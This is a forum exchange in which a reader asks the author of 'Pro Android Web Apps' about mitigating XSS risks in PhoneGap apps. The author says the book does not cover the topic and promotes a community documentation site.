Does Pro Android Web Apps cover information on security considerations when developing Android web apps?
For instance, with desktop browsers a cross-site scripting (XSS) attack can "only" steal users' credentials, port scan the internal network, perform privileged actions impersonating an authenticated user, etc., but within an Android app that uses PhoneGap, a whole range of other possibilities open up, such as meddling with the filesystem, taking pictures with the camera and posting these to the Internet, posting the user's exact location (GPS), uploading the user's contacts to a public web site, initiating calls, and other malicious things. Are there good strategies for mitigating the potential damage by a XSS attack on a PhoneGap app?
This isn't something that we cover specifically in the book, but I would be more than happy to blog (or write an article, see below) about it. In fact a good friend of mine will be joining me in my business pretty soon and he has extensive experience in the security space, so I would probably pick his brains or potentially even collaborate on writing that post.
In addition to the book, I plan on building up some online resources at a site I've created @ http://www.xpmobi.org/. All the content there will be creative commons licensed and I'm building the site using Jekyll with the intention that people can fork a github repository (https://github.com/sidelab/xpmobi) and contribute articles, all while getting to write their content using markdown
With some of the stuff your getting up to Daniel, I'd certainly welcome any contributions from yourself regarding the things you are doing in the "hybrid" web app / native app space.
The site is still a work in progress, and I have to get a couple of those pages finished before the book hits the shelves...
Kind of got off topic there... sorry... I'm just really keen to see more, useful information around how people can go about building cross-platform mobile apps. The book definitely captures some of that information, but there is just so much more that we can cover, as this particular thread points out.